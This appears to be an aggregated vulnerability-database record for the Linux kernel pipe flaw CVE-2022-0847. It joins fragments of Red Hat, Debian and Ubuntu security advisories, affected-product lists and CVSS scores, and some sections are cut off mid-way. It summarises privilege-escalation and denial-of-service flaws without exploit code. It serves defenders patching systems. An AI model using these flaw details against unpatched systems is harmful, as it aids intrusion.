- Bugs fixed (https://bugzilla.redhat.com/):
2031930 - CVE-2021-0920 kernel: Use After Free in unix_gc() which could result in a local privilege escalation 2034514 - CVE-2021-4154 kernel: local privilege escalation by exploiting the fsconfig syscall parameter leads to container breakout 2042404 - CVE-2022-0330 kernel: possible privileges escalation due to missing TLB flush 2044809 - CVE-2022-22942 kernel: failing usercopy allows for use-after-free exploitation 2048738 - CVE-2022-0435 kernel: remote stack overflow via kernel panic on systems using TIPC may lead to DoS 2051505 - CVE-2022-0492 kernel: cgroups v1 release_agent feature may allow privilege escalation 2060795 - CVE-2022-0847 kernel: improper initialization of the "flags" member of the new pipe_buffer
- Package List:
Red Hat Enterprise Linux Real Time for NFV (v. 8):
Source: kernel-rt-4.18.0-348.20.1.rt7.150.el8_5.src.rpm
x86_64: kernel-rt-4.18.0-348.20.1.rt7.150.el8_5.x86_64.rpm kernel-rt-core-4.18.0-348.20.1.rt7.150.el8_5.x86_64.rpm kernel-rt-debug-4.18.0-348.20.1.rt7.150.el8_5.x86_64.rpm kernel-rt-debug-core-4.18.0-348.20.1.rt7.150.el8_5.x86_64.rpm kernel-rt-debug-debuginfo-4.18.0-348.20.1.rt7.150.el8_5.x86_64.rpm kernel-rt-debug-devel-4.18.0-348.20.1.rt7.150.el8_5.x86_64.rpm kernel-rt-debug-kvm-4.18.0-348.20.1.rt7.150.el8_5.x86_64.rpm kernel-rt-debug-modules-4.18.0-348.20.1.rt7.150.el8_5.x86_64.rpm kernel-rt-debug-modules-extra-4.18.0-348.20.1.rt7.150.el8_5.x86_64.rpm kernel-rt-debuginfo-4.18.0-348.20.1.rt7.150.el8_5.x86_64.rpm kernel-rt-debuginfo-common-x86_64-4.18.0-348.20.1.rt7.150.el8_5.x86_64.rpm kernel-rt-devel-4.18.0-348.20.1.rt7.150.el8_5.x86_64.rpm kernel-rt-kvm-4.18.0-348.20.1.rt7.150.el8_5.x86_64.rpm kernel-rt-modules-4.18.0-348.20.1.rt7.150.el8_5.x86_64.rpm kernel-rt-modules-extra-4.18.0-348.20.1.rt7.150.el8_5.x86_64.rpm
Red Hat Enterprise Linux for Real Time (v. 8):
Source: kernel-rt-4.18.0-348.20.1.rt7.150.el8_5.src.rpm
x86_64: kernel-rt-4.18.0-348.20.1.rt7.150.el8_5.x86_64.rpm kernel-rt-core-4.18.0-348.20.1.rt7.150.el8_5.x86_64.rpm kernel-rt-debug-4.18.0-348.20.1.rt7.150.el8_5.x86_64.rpm kernel-rt-debug-core-4.18.0-348.20.1.rt7.150.el8_5.x86_64.rpm kernel-rt-debug-debuginfo-4.18.0-348.20.1.rt7.150.el8_5.x86_64.rpm kernel-rt-debug-devel-4.18.0-348.20.1.rt7.150.el8_5.x86_64.rpm kernel-rt-debug-modules-4.18.0-348.20.1.rt7.150.el8_5.x86_64.rpm kernel-rt-debug-modules-extra-4.18.0-348.20.1.rt7.150.el8_5.x86_64.rpm kernel-rt-debuginfo-4.18.0-348.20.1.rt7.150.el8_5.x86_64.rpm kernel-rt-debuginfo-common-x86_64-4.18.0-348.20.1.rt7.150.el8_5.x86_64.rpm kernel-rt-devel-4.18.0-348.20.1.rt7.150.el8_5.x86_64.rpm kernel-rt-modules-4.18.0-348.20.1.rt7.150.el8_5.x86_64.rpm kernel-rt-modules-extra-4.18.0-348.20.1.rt7.150.el8_5.x86_64.rpm
These packages are GPG signed by Red Hat for security. Our key and details on how to verify the signature are available from https://access.redhat.com/security/team/key/
- Contact:
The Red Hat security contact is secalert@redhat.com. More contact details at https://access.redhat.com/security/team/contact/
Copyright 2022 Red Hat, Inc. -----BEGIN PGP SIGNATURE----- Version: GnuPG v1
iQIVAwUBYippFNzjgjWX9erEAQhDwRAAjsGfW6qXFI81H8xov/wQnw/PdsUOhzDl ISzJEeXALEQCloLH+UDcgo/wV1es00USfBo1H/SpDc5ahjBWP2pbo8QtIRKT6h/k ord4KsAMGjqWRI+zaGbaFoL0q4okMG9H6r731TnhX06CaLXLui8iUJrQLziHo02t /AihF9dW30/w4tXyKeMc73D1lKHImQQFfJo5xpIo8Mm7+6GFrkne8Z46SKXjjyfG IODAcU3wA0C93bbtR4EHEbenVyVVaE5Phn40vxxF00+AQTHoc5nYpOJbDLI3bi1F GbEKQ5pf0jkScwlfEHtHkmjPk92PA/wV41BhPoJw8oKshH4RRxml4Ps0KldI4NrQ ypmDLZ3CfJ+saFbNLN5BARCiqJavF5A4yszHZ5QuopmC1RJx6/rAuE79KkeB0JvW IOaXPzzc05dCqdyVBvNAu+XpVlTbe+XGBR0LalYYjYWxQSrEYAYQ005mcvEWOPRm QfPSM7eOaAzo9RGrMirTm0Gz9BJ0TbvNGiMmMTpLdb6akx1BQcQ5bpAjUCQN0O7j KIFri0FxflweqZswTchfdbW74VuUyTVaeFYKGhp5hFPV6lFkDUFEFC71ANvPaewE X1Z5Ae0gFMD8w5m5eePHqYuEaL6NHtYctHlBh0ef6mrvsKq9lmxJpdXrZUO+eP4w nEhPbkKSmMY= =CLN6 -----END PGP SIGNATURE----- -- RHSA-announce mailing list RHSA-announce@redhat.com https://listman.redhat.com/mailman/listinfo/rhsa-announce
Show details on source website{
"affected_products": {
"_id": null,
"data": [
{
"_id": null,
"model": "h500s",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "fedora",
"scope": "eq",
"trust": 1.0,
"vendor": "fedoraproject",
"version": "35"
},
{
"_id": null,
"model": "h300e",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "enterprise linux for real time",
"scope": "eq",
"trust": 1.0,
"vendor": "redhat",
"version": "8"
},
{
"_id": null,
"model": "enterprise linux server tus",
"scope": "eq",
"trust": 1.0,
"vendor": "redhat",
"version": "8.4"
},
{
"_id": null,
"model": "enterprise linux for ibm z systems eus",
"scope": "eq",
"trust": 1.0,
"vendor": "redhat",
"version": "8.4"
},
{
"_id": null,
"model": "sma1000",
"scope": "lte",
"trust": 1.0,
"vendor": "sonicwall",
"version": "12.4.2-02044"
},
{
"_id": null,
"model": "kernel",
"scope": "gte",
"trust": 1.0,
"vendor": "linux",
"version": "5.8"
},
{
"_id": null,
"model": "ovirt-engine",
"scope": "eq",
"trust": 1.0,
"vendor": "ovirt",
"version": "4.4.10.2"
},
{
"_id": null,
"model": "scalance lpe9403",
"scope": "lt",
"trust": 1.0,
"vendor": "siemens",
"version": "2.0"
},
{
"_id": null,
"model": "enterprise linux server for power little endian update services for sap solutions",
"scope": "eq",
"trust": 1.0,
"vendor": "redhat",
"version": "8.2"
},
{
"_id": null,
"model": "enterprise linux for real time tus",
"scope": "eq",
"trust": 1.0,
"vendor": "redhat",
"version": "8.4"
},
{
"_id": null,
"model": "h410s",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "enterprise linux for power little endian eus",
"scope": "eq",
"trust": 1.0,
"vendor": "redhat",
"version": "8.2"
},
{
"_id": null,
"model": "enterprise linux server aus",
"scope": "eq",
"trust": 1.0,
"vendor": "redhat",
"version": "8.2"
},
{
"_id": null,
"model": "kernel",
"scope": "lt",
"trust": 1.0,
"vendor": "linux",
"version": "5.16.11"
},
{
"_id": null,
"model": "enterprise linux server update services for sap solutions",
"scope": "eq",
"trust": 1.0,
"vendor": "redhat",
"version": "8.4"
},
{
"_id": null,
"model": "h700s",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "enterprise linux server for power little endian update services for sap solutions",
"scope": "eq",
"trust": 1.0,
"vendor": "redhat",
"version": "8.1"
},
{
"_id": null,
"model": "kernel",
"scope": "lt",
"trust": 1.0,
"vendor": "linux",
"version": "5.15.25"
},
{
"_id": null,
"model": "enterprise linux eus",
"scope": "eq",
"trust": 1.0,
"vendor": "redhat",
"version": "8.4"
},
{
"_id": null,
"model": "enterprise linux for real time for nfv tus",
"scope": "eq",
"trust": 1.0,
"vendor": "redhat",
"version": "8.4"
},
{
"_id": null,
"model": "enterprise linux server tus",
"scope": "eq",
"trust": 1.0,
"vendor": "redhat",
"version": "8.2"
},
{
"_id": null,
"model": "kernel",
"scope": "gte",
"trust": 1.0,
"vendor": "linux",
"version": "5.15"
},
{
"_id": null,
"model": "enterprise linux for ibm z systems eus",
"scope": "eq",
"trust": 1.0,
"vendor": "redhat",
"version": "8.2"
},
{
"_id": null,
"model": "enterprise linux for real time for nfv",
"scope": "eq",
"trust": 1.0,
"vendor": "redhat",
"version": "8"
},
{
"_id": null,
"model": "codeready linux builder",
"scope": "eq",
"trust": 1.0,
"vendor": "redhat",
"version": null
},
{
"_id": null,
"model": "kernel",
"scope": "gte",
"trust": 1.0,
"vendor": "linux",
"version": "5.16"
},
{
"_id": null,
"model": "virtualization host",
"scope": "eq",
"trust": 1.0,
"vendor": "redhat",
"version": "4.0"
},
{
"_id": null,
"model": "enterprise linux for real time tus",
"scope": "eq",
"trust": 1.0,
"vendor": "redhat",
"version": "8.2"
},
{
"_id": null,
"model": "h410c",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "enterprise linux server update services for sap solutions",
"scope": "eq",
"trust": 1.0,
"vendor": "redhat",
"version": "8.2"
},
{
"_id": null,
"model": "h700e",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "enterprise linux for power little endian",
"scope": "eq",
"trust": 1.0,
"vendor": "redhat",
"version": "8.0"
},
{
"_id": null,
"model": "enterprise linux",
"scope": "eq",
"trust": 1.0,
"vendor": "redhat",
"version": "8.0"
},
{
"_id": null,
"model": "enterprise linux eus",
"scope": "eq",
"trust": 1.0,
"vendor": "redhat",
"version": "8.2"
},
{
"_id": null,
"model": "kernel",
"scope": "lt",
"trust": 1.0,
"vendor": "linux",
"version": "5.10.102"
},
{
"_id": null,
"model": "enterprise linux for power little endian eus",
"scope": "eq",
"trust": 1.0,
"vendor": "redhat",
"version": "8.4"
},
{
"_id": null,
"model": "enterprise linux server update services for sap solutions",
"scope": "eq",
"trust": 1.0,
"vendor": "redhat",
"version": "8.1"
},
{
"_id": null,
"model": "enterprise linux server for power little endian update services for sap solutions",
"scope": "eq",
"trust": 1.0,
"vendor": "redhat",
"version": "8.4"
},
{
"_id": null,
"model": "h500e",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "enterprise linux for real time for nfv tus",
"scope": "eq",
"trust": 1.0,
"vendor": "redhat",
"version": "8.2"
},
{
"_id": null,
"model": "h300s",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "enterprise linux server aus",
"scope": "eq",
"trust": 1.0,
"vendor": "redhat",
"version": "8.4"
},
{
"_id": null,
"model": "enterprise linux for ibm z systems",
"scope": "eq",
"trust": 1.0,
"vendor": "redhat",
"version": "8.0"
},
{
"_id": null,
"model": "fedora",
"scope": null,
"trust": 0.8,
"vendor": "fedora",
"version": null
},
{
"_id": null,
"model": "sma1000",
"scope": null,
"trust": 0.8,
"vendor": "sonicwall",
"version": null
},
{
"_id": null,
"model": "red hat enterprise linux eus",
"scope": null,
"trust": 0.8,
"vendor": "\u30ec\u30c3\u30c9\u30cf\u30c3\u30c8",
"version": null
},
{
"_id": null,
"model": "h300s",
"scope": null,
"trust": 0.8,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "ovirt-engine",
"scope": null,
"trust": 0.8,
"vendor": "ovirt",
"version": null
},
{
"_id": null,
"model": "red hat enterprise linux for ibm z systems - extended update support",
"scope": null,
"trust": 0.8,
"vendor": "\u30ec\u30c3\u30c9\u30cf\u30c3\u30c8",
"version": null
},
{
"_id": null,
"model": "red hat enterprise linux for ibm z systems",
"scope": null,
"trust": 0.8,
"vendor": "\u30ec\u30c3\u30c9\u30cf\u30c3\u30c8",
"version": null
},
{
"_id": null,
"model": "kernel",
"scope": null,
"trust": 0.8,
"vendor": "linux",
"version": null
},
{
"_id": null,
"model": "red hat enterprise linux",
"scope": null,
"trust": 0.8,
"vendor": "\u30ec\u30c3\u30c9\u30cf\u30c3\u30c8",
"version": null
},
{
"_id": null,
"model": "scalance lpe9403",
"scope": null,
"trust": 0.8,
"vendor": "\u30b7\u30fc\u30e1\u30f3\u30b9",
"version": null
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2022-007117"
},
{
"db": "NVD",
"id": "CVE-2022-0847"
}
]
},
"credits": {
"_id": null,
"data": "Siemens reported these vulnerabilities to CISA.",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202203-522"
}
],
"trust": 0.6
},
"cve": "CVE-2022-0847",
"cvss": {
"_id": null,
"data": [
{
"cvssV2": [
{
"accessComplexity": "LOW",
"accessVector": "LOCAL",
"authentication": "NONE",
"author": "nvd@nist.gov",
"availabilityImpact": "COMPLETE",
"baseScore": 7.2,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 3.9,
"id": "CVE-2022-0847",
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"severity": "HIGH",
"trust": 1.9,
"vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"author": "nvd@nist.gov",
"availabilityImpact": "HIGH",
"baseScore": 7.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 1.8,
"id": "CVE-2022-0847",
"impactScore": 5.9,
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"trust": 2.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
{
"attackComplexity": "Low",
"attackVector": "Local",
"author": "NVD",
"availabilityImpact": "High",
"baseScore": 7.8,
"baseSeverity": "High",
"confidentialityImpact": "High",
"exploitabilityScore": null,
"id": "CVE-2022-0847",
"impactScore": null,
"integrityImpact": "High",
"privilegesRequired": "Low",
"scope": "Unchanged",
"trust": 0.8,
"userInteraction": "None",
"vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
}
],
"severity": [
{
"author": "nvd@nist.gov",
"id": "CVE-2022-0847",
"trust": 1.0,
"value": "HIGH"
},
{
"author": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"id": "CVE-2022-0847",
"trust": 1.0,
"value": "HIGH"
},
{
"author": "NVD",
"id": "CVE-2022-0847",
"trust": 0.8,
"value": "High"
},
{
"author": "CNNVD",
"id": "CNNVD-202203-522",
"trust": 0.6,
"value": "HIGH"
},
{
"author": "VULMON",
"id": "CVE-2022-0847",
"trust": 0.1,
"value": "HIGH"
}
]
}
],
"sources": [
{
"db": "VULMON",
"id": "CVE-2022-0847"
},
{
"db": "CNNVD",
"id": "CNNVD-202203-522"
},
{
"db": "JVNDB",
"id": "JVNDB-2022-007117"
},
{
"db": "NVD",
"id": "CVE-2022-0847"
},
{
"db": "NVD",
"id": "CVE-2022-0847"
}
]
},
"description": {
"_id": null,
"data": "A flaw was found in the way the \"flags\" member of the new pipe buffer structure was lacking proper initialization in copy_page_to_iter_pipe and push_pipe functions in the Linux kernel and could thus contain stale values. An unprivileged local user could use this flaw to write to pages in the page cache backed by read only files and as such escalate their privileges on the system. Linux Kernel Has an initialization vulnerability.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be in a state. \n\nCVE-2021-43976\n\n Zekun Shen and Brendan Dolan-Gavitt discovered a flaw in the\n mwifiex_usb_recv() function of the Marvell WiFi-Ex USB Driver. \n\nCVE-2022-24448\n\n Lyu Tao reported a flaw in the NFS implementation in the Linux\n kernel when handling requests to open a directory on a regular file,\n which could result in a information leak. \n\nCVE-2022-25258\n\n Szymon Heidrich reported the USB Gadget subsystem lacks certain\n validation of interface OS descriptor requests, resulting in memory\n corruption. \n\nCVE-2022-25375\n\n Szymon Heidrich reported that the RNDIS USB gadget lacks validation\n of the size of the RNDIS_MSG_SET command, resulting in information\n leak from kernel memory. \n\nFor the stable distribution (bullseye), these problems have been fixed in\nversion 5.10.92-2. \n\nFor the detailed security status of linux please refer to its security\ntracker page at:\nhttps://security-tracker.debian.org/tracker/linux\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org\n-----BEGIN PGP SIGNATURE-----\n\niQKTBAEBCgB9FiEERkRAmAjBceBVMd3uBUy48xNDz0QFAmImAChfFIAAAAAALgAo\naXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldDQ2\nNDQ0MDk4MDhDMTcxRTA1NTMxRERFRTA1NENCOEYzMTM0M0NGNDQACgkQBUy48xND\nz0TlAw/+MoL+9zYTlpPOcWp0YMuOkEUJU3WS7udSyTSZLNZsWuQTVmPQ6ed7Fxw/\nb0j6OCX9HbrIl4nJdx+7D53ujWC6hS29TLgHCb8d/TEeluXPVI2+4Nt1FcZbSXTJ\n6hBNIVVIiDUV9Wco8JUVbvk+y8VCsHxqDEePpEOTZVYLyDUUdti4V7+3ZyO8XQ4/\nePeCX8QQba5FApsz4jG7CkBCxBxyley6YswPV3Zz1FF6L/hGjgluYiKFbO4mLTlX\nvqwv/UIAZl2rutHzzxyBE5hIlPGXfgksPI7jTmSMRkWI99cIlJWTlziecYLQUiid\n2NwOyu2vrut6ZVbtmI5WbTy64Aa9EKguQLd+SbBMuK790nfTLRySaZnU52/1j1MW\n1/3Nwq+pDbZ/yAAeV/TS9oKl3mG3XVOO34EGpr9A5aZzCPetyb1TQj0jR5+mjCxy\nRTxYZuCrisnFvVXXRZLPc1vPcZW+ULXrPQFWEEvd2WKRa6iIkDHf5ef8pHRm36mk\n9Yt0x6UmmVWLRRZp7UCbD03NB5p3oJKi+i1h3d+19jQGwU2bEhfOEADCADqlZLwc\n/6vFZ7TrA/74LXM8MOc5+VQbxL8nGetenPSHuxNwoeXw1ry4+x9KV6YHMqeqQ/qW\njFpIOfWS1HQ9vC9t46V2eE0sfrOu2Jvdm4MixwRbXhjzs/REYTY=\n=MIhw\n-----END PGP SIGNATURE-----\n. This update provides security fixes, bug\nfixes, and updates the container images. Description:\n\nRed Hat Advanced Cluster Management for Kubernetes 2.4.3 images\n\nRed Hat Advanced Cluster Management for Kubernetes provides the\ncapabilities to address common challenges that administrators and site\nreliability engineers face as they work across a range of public and\nprivate cloud environments. Clusters and applications are all visible and\nmanaged from a single console\u2014with security policy built in. \nSee the following Release Notes documentation, which will be updated\nshortly for this release, for additional details about this release:\n\nhttps://access.redhat.com/documentation/en-us/red_hat_advanced_cluster_management_for_kubernetes/2.4/html/release_notes/\n\nSecurity updates:\n\n* golang.org/x/crypto: empty plaintext packet causes panic (CVE-2021-43565)\n\n* nats-server: misusing the \"dynamically provisioned sandbox accounts\"\nfeature authenticated user can obtain the privileges of the System account\n(CVE-2022-24450)\n\n* nanoid: Information disclosure via valueOf() function (CVE-2021-23566)\n\n* nodejs-shelljs: improper privilege management (CVE-2022-0144)\n\n* search-ui-container: follow-redirects: Exposure of Private Personal\nInformation to an Unauthorized Actor (CVE-2022-0155)\n\n* node-fetch: exposure of sensitive information to an unauthorized actor\n(CVE-2022-0235)\n\n* follow-redirects: Exposure of Sensitive Information via Authorization\nHeader leak (CVE-2022-0536)\n\n* openssl: Infinite loop in BN_mod_sqrt() reachable when parsing\ncertificates (CVE-2022-0778)\n\n* imgcrypt: Unauthorized access to encryted container image on a shared\nsystem due to missing check in CheckAuthorization() code path\n(CVE-2022-24778)\n\n* golang: crash in a golang.org/x/crypto/ssh server (CVE-2022-27191)\n\n* opencontainers: OCI manifest and index parsing confusion (CVE-2021-41190)\n\nRelated bugs:\n\n* RHACM 2.4.3 image files (BZ #2057249)\n\n* Observability - dashboard name contains `/` would cause error when\ngenerating dashboard cm (BZ #2032128)\n\n* ACM application placement fails after renaming the application name (BZ\n#2033051)\n\n* Disable the obs metric collect should not impact the managed cluster\nupgrade (BZ #2039197)\n\n* Observability - cluster list should only contain OCP311 cluster on OCP311\ndashboard (BZ #2039820)\n\n* The value of name label changed from clusterclaim name to cluster name\n(BZ #2042223)\n\n* VMWare Cluster creation does not accept ecdsa-sha2-nistp521 ssh keys (BZ\n#2048500)\n\n* clusterSelector matchLabels spec are cleared when changing app\nname/namespace during creating an app in UI (BZ #2053211)\n\n* Application cluster status is not updated in UI after restoring (BZ\n#2053279)\n\n* OpenStack cluster creation is using deprecated floating IP config for\n4.7+ (BZ #2056610)\n\n* The value of Vendor reported by cluster metrics was Other even if the\nvendor label in managedcluster was Openshift (BZ #2059039)\n\n* Subscriptions stop reconciling after channel secrets are recreated (BZ\n#2059954)\n\n* Placementrule is not reconciling on a new fresh environment (BZ #2074156)\n\n* The cluster claimed from clusterpool cannot auto imported (BZ #2074543)\n\n3. Bugs fixed (https://bugzilla.redhat.com/):\n\n2024938 - CVE-2021-41190 opencontainers: OCI manifest and index parsing confusion\n2030787 - CVE-2021-43565 golang.org/x/crypto: empty plaintext packet causes panic\n2032128 - Observability - dashboard name contains `/` would cause error when generating dashboard cm\n2033051 - ACM application placement fails after renaming the application name\n2039197 - disable the obs metric collect should not impact the managed cluster upgrade\n2039820 - Observability - cluster list should only contain OCP311 cluster on OCP311 dashboard\n2042223 - the value of name label changed from clusterclaim name to cluster name\n2043535 - CVE-2022-0144 nodejs-shelljs: improper privilege management\n2044556 - CVE-2022-0155 follow-redirects: Exposure of Private Personal Information to an Unauthorized Actor\n2044591 - CVE-2022-0235 node-fetch: exposure of sensitive information to an unauthorized actor\n2048500 - VMWare Cluster creation does not accept ecdsa-sha2-nistp521 ssh keys\n2050853 - CVE-2021-23566 nanoid: Information disclosure via valueOf() function\n2052573 - CVE-2022-24450 nats-server: misusing the \"dynamically provisioned sandbox accounts\" feature authenticated user can obtain the privileges of the System account\n2053211 - clusterSelector matchLabels spec are cleared when changing app name/namespace during creating an app in UI\n2053259 - CVE-2022-0536 follow-redirects: Exposure of Sensitive Information via Authorization Header leak\n2053279 - Application cluster status is not updated in UI after restoring\n2056610 - OpenStack cluster creation is using deprecated floating IP config for 4.7+\n2057249 - RHACM 2.4.3 images\n2059039 - The value of Vendor reported by cluster metrics was Other even if the vendor label in managedcluster was Openshift\n2059954 - Subscriptions stop reconciling after channel secrets are recreated\n2062202 - CVE-2022-0778 openssl: Infinite loop in BN_mod_sqrt() reachable when parsing certificates\n2064702 - CVE-2022-27191 golang: crash in a golang.org/x/crypto/ssh server\n2069368 - CVE-2022-24778 imgcrypt: Unauthorized access to encryted container image on a shared system due to missing check in CheckAuthorization() code path\n2074156 - Placementrule is not reconciling on a new fresh environment\n2074543 - The cluster claimed from clusterpool can not auto imported\n\n5. See the following\nRelease Notes documentation, which will be updated shortly for this\nrelease, for additional details about this release:\n\nhttps://access.redhat.com/documentation/en-us/red_hat_advanced_cluster_management_for_kubernetes/2.3/html/release_notes/\n\nSecurity updates:\n\n* nanoid: Information disclosure via valueOf() function (CVE-2021-23566)\n\n* nodejs-shelljs: improper privilege management (CVE-2022-0144)\n\n* follow-redirects: Exposure of Private Personal Information to an\nUnauthorized Actor (CVE-2022-0155)\n\n* node-fetch: exposure of sensitive information to an unauthorized actor\n(CVE-2022-0235)\n\n* follow-redirects: Exposure of Sensitive Information via Authorization\nHeader leak (CVE-2022-0536)\n\nBug fix:\n\n* RHACM 2.3.8 images (Bugzilla #2062316)\n\n3. Bugs fixed (https://bugzilla.redhat.com/):\n\n2043535 - CVE-2022-0144 nodejs-shelljs: improper privilege management\n2044556 - CVE-2022-0155 follow-redirects: Exposure of Private Personal Information to an Unauthorized Actor\n2044591 - CVE-2022-0235 node-fetch: exposure of sensitive information to an unauthorized actor\n2050853 - CVE-2021-23566 nanoid: Information disclosure via valueOf() function\n2053259 - CVE-2022-0536 follow-redirects: Exposure of Sensitive Information via Authorization Header leak\n2062316 - RHACM 2.3.8 images\n\n5. =========================================================================\nUbuntu Security Notice USN-5362-1\nApril 01, 2022\n\nlinux-intel-5.13 vulnerabilities\n=========================================================================\nA security issue affects these releases of Ubuntu and its derivatives:\n\n- Ubuntu 20.04 LTS\n\nSummary:\n\nSeveral security issues were fixed in the Linux kernel. \n\nSoftware Description:\n- linux-intel-5.13: Linux kernel for Intel IOTG\n\nDetails:\n\nNick Gregory discovered that the Linux kernel incorrectly handled network\noffload functionality. A local attacker could use this to cause a denial of\nservice or possibly execute arbitrary code. (CVE-2022-25636)\n\nEnrico Barberis, Pietro Frigo, Marius Muench, Herbert Bos, and Cristiano\nGiuffrida discovered that hardware mitigations added by ARM to their\nprocessors to address Spectre-BTI were insufficient. A local attacker could\npotentially use this to expose sensitive information. (CVE-2022-23960)\n\nIt was discovered that the BPF verifier in the Linux kernel did not\nproperly restrict pointer types in certain situations. A local attacker\ncould use this to cause a denial of service (system crash) or possibly\nexecute arbitrary code. (CVE-2022-23222)\n\nMax Kellermann discovered that the Linux kernel incorrectly handled Unix\npipes. A local attacker could potentially use this to modify any file that\ncould be opened for reading. (CVE-2022-0847)\n\nYiqi Sun and Kevin Wang discovered that the cgroups implementation in the\nLinux kernel did not properly restrict access to the cgroups v1\nrelease_agent feature. A local attacker could use this to gain\nadministrative privileges. (CVE-2022-0492)\n\nWilliam Liu and Jamie Hill-Daniel discovered that the file system context\nfunctionality in the Linux kernel contained an integer underflow\nvulnerability, leading to an out-of-bounds write. A local attacker could\nuse this to cause a denial of service (system crash) or execute arbitrary\ncode. (CVE-2022-0185)\n\nEnrico Barberis, Pietro Frigo, Marius Muench, Herbert Bos, and Cristiano\nGiuffrida discovered that hardware mitigations added by Intel to their\nprocessors to address Spectre-BTI were insufficient. A local attacker could\npotentially use this to expose sensitive information. (CVE-2022-0001)\n\nJann Horn discovered a race condition in the Unix domain socket\nimplementation in the Linux kernel that could result in a read-after-free. \nA local attacker could use this to cause a denial of service (system crash)\nor possibly execute arbitrary code. (CVE-2021-4083)\n\nIt was discovered that the NFS server implementation in the Linux kernel\ncontained an out-of-bounds write vulnerability. A local attacker could use\nthis to cause a denial of service (system crash) or possibly execute\narbitrary code. (CVE-2021-4090)\n\nKirill Tkhai discovered that the XFS file system implementation in the\nLinux kernel did not calculate size correctly when pre-allocating space in\nsome situations. A local attacker could use this to expose sensitive\ninformation. (CVE-2021-4155)\n\nIt was discovered that the AMD Radeon GPU driver in the Linux kernel did\nnot properly validate writes in the debugfs file system. A privileged\nattacker could use this to cause a denial of service (system crash) or\npossibly execute arbitrary code. (CVE-2021-42327)\n\nSushma Venkatesh Reddy discovered that the Intel i915 graphics driver in\nthe Linux kernel did not perform a GPU TLB flush in some situations. A\nlocal attacker could use this to cause a denial of service or possibly\nexecute arbitrary code. (CVE-2022-0330)\n\nSamuel Page discovered that the Transparent Inter-Process Communication\n(TIPC) protocol implementation in the Linux kernel contained a stack-based\nbuffer overflow. A remote attacker could use this to cause a denial of\nservice (system crash) for systems that have a TIPC bearer configured. \n(CVE-2022-0435)\n\nIt was discovered that the KVM implementation for s390 systems in the Linux\nkernel did not properly prevent memory operations on PVM guests that were\nin non-protected mode. A local attacker could use this to obtain\nunauthorized memory write access. (CVE-2022-0516)\n\nIt was discovered that the ICMPv6 implementation in the Linux kernel did\nnot properly deallocate memory in certain situations. A remote attacker\ncould possibly use this to cause a denial of service (memory exhaustion). \n(CVE-2022-0742)\n\nIt was discovered that the VMware Virtual GPU driver in the Linux kernel\ndid not properly handle certain failure conditions, leading to a stale\nentry in the file descriptor table. A local attacker could use this to\nexpose sensitive information or possibly gain administrative privileges. \n(CVE-2022-22942)\n\nUpdate instructions:\n\nThe problem can be corrected by updating your system to the following\npackage versions:\n\nUbuntu 20.04 LTS:\n linux-image-5.13.0-1010-intel 5.13.0-1010.10\n linux-image-intel 5.13.0.1010.11\n\nAfter a standard system update you need to reboot your computer to make\nall the necessary changes. \n\nATTENTION: Due to an unavoidable ABI change the kernel updates have\nbeen given a new version number, which requires you to recompile and\nreinstall all third party kernel modules you might have installed. \nUnless you manually uninstalled the standard kernel metapackages\n(e.g. linux-generic, linux-generic-lts-RELEASE, linux-virtual,\nlinux-powerpc), a standard system upgrade will automatically perform\nthis as well. \n\nReferences:\n https://ubuntu.com/security/notices/USN-5362-1\n CVE-2021-4083, CVE-2021-4090, CVE-2021-4155, CVE-2021-42327,\n CVE-2022-0001, CVE-2022-0185, CVE-2022-0330, CVE-2022-0435,\n CVE-2022-0492, CVE-2022-0516, CVE-2022-0742, CVE-2022-0847,\n CVE-2022-22942, CVE-2022-23222, CVE-2022-23960, CVE-2022-25636\n\nPackage Information:\n https://launchpad.net/ubuntu/+source/linux-intel-5.13/5.13.0-1010.10\n. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA256\n\n=====================================================================\n Red Hat Security Advisory\n\nSynopsis: Important: kernel-rt security and bug fix update\nAdvisory ID: RHSA-2022:0819-01\nProduct: Red Hat Enterprise Linux\nAdvisory URL: https://access.redhat.com/errata/RHSA-2022:0819\nIssue date: 2022-03-10\nCVE Names: CVE-2021-0920 CVE-2021-4154 CVE-2022-0330 \n CVE-2022-0435 CVE-2022-0492 CVE-2022-0847 \n CVE-2022-22942 \n=====================================================================\n\n1. Summary:\n\nAn update for kernel-rt is now available for Red Hat Enterprise Linux 8. \n\nRed Hat Product Security has rated this update as having a security impact\nof Important. A Common Vulnerability Scoring System (CVSS) base score,\nwhich gives a detailed severity rating, is available for each vulnerability\nfrom the CVE link(s) in the References section. \n\n2. Relevant releases/architectures:\n\nRed Hat Enterprise Linux Real Time for NFV (v. 8) - 